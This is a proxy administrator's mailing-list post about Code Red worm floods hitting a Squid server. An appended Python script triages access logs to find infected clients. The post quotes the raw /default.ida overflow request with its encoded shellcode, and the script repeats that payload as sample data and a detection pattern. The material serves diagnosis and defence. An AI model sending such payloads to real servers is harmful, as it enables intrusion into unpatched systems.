Hi,

We are seeing a possible new Code Red. Each victim will flood a particular destination. Unlike the original one, this one does not send a proper HTTP method. Although Squid will return Bad Request, this attack will consume a lot of resources and bring down the Squid box...
Anybody catching the same thing? It seems to us that DENIED/403 requires less processing than returning NONE/400 or NONE/411. If this is true, is there any way to deny these requests?

GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
Content-type: text/xml
Content-length: 3379

Squid 2.4S6 reply: HTTP/1.0 411 Length Required.
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
Host: xxx.xx.xxx.xx
Content-type: text/xml
Content-length: 3379
Cache-Control: max-stale=0

Squid 2.4S6 reply: HTTP/1.0 400 Bad Request.

Thanks,
Wei Keong
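Since the post asks how to cope with these floods, here is an added example (editor's code, not from the original thread) that triages Squid's native access.log to find the internal clients generating the /default.ida requests and the method-less NONE/400 and NONE/411 hits, so the infected hosts can be located and cleaned instead of only being handed 403s. It assumes the native Squid log layout (time, elapsed, client, code/status, bytes, method, URL, ...) and the constructed sample lines embedded below; the URL Squid logs for a malformed request differs between versions, so that field in the sample is an assumption.

```python
"""Triage a Squid native-format access.log for Code Red style floods.

Constructed example, not code from the original post. Assumes the native
log layout: time elapsed client code/status bytes method URL ident peer type.
"""
import re
from collections import Counter, defaultdict

# Constructed sample log lines (not captured traffic). The url field for
# the method-less request ("NONE -") is an assumption about Squid's logging.
SAMPLE_LOG = """\
998822400.100    12 10.1.2.3 NONE/411 1780 GET http://10.9.9.9/default.ida?XXXXXXXX%u9090%u6858%ucbd3%u7801%u00=a - NONE/- text/html
998822400.250    11 10.1.2.3 NONE/400 1640 NONE - - NONE/- text/html
998822400.300     9 10.1.2.4 NONE/411 1780 GET http://10.9.9.9/default.ida?XXXXXXXX%u9090%u6858%u00=a - NONE/- text/html
998822401.000   120 10.1.2.5 TCP_MISS/200 4523 GET http://www.example.com/index.html - DIRECT/192.0.2.10 text/html
998822401.500    10 10.1.2.3 DENIED/403 1200 GET http://10.9.9.9/default.ida?XXXX%u9090%u00=a - NONE/- text/html
"""

LOG_RE = re.compile(
    r"^(?P<ts>\d+\.\d+)\s+(?P<elapsed>\d+)\s+(?P<client>\S+)\s+"
    r"(?P<code>\S+)/(?P<status>\d{3})\s+(?P<bytes>\d+)\s+(?P<method>\S+)\s+(?P<url>\S+)"
)
# The /default.ida?XXX...%u9090 query is the Code Red request signature shown in the post.
CODERED_URL = re.compile(r"/default\.ida\?X+%u9090", re.IGNORECASE)
# Statuses Squid returned for the two request shapes in the post.
SUSPECT_STATUS = {"400", "411"}


def classify(line):
    """Return 'codered', 'malformed', 'ok', or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    if CODERED_URL.search(m.group("url")):
        return "codered"
    if m.group("status") in SUSPECT_STATUS:
        return "malformed"
    return "ok"


def suspects(log_text, threshold=2):
    """Count codered/malformed hits per client; return clients at or above threshold."""
    per_client = defaultdict(Counter)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        kind = classify(line)
        if m and kind in ("codered", "malformed"):
            per_client[m.group("client")][kind] += 1
    return {c: dict(k) for c, k in per_client.items() if sum(k.values()) >= threshold}
```

Run `suspects(open("/var/log/squid/access.log").read())` against a real log to get the per-client breakdown; the threshold keeps one-off parse errors out of the report.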
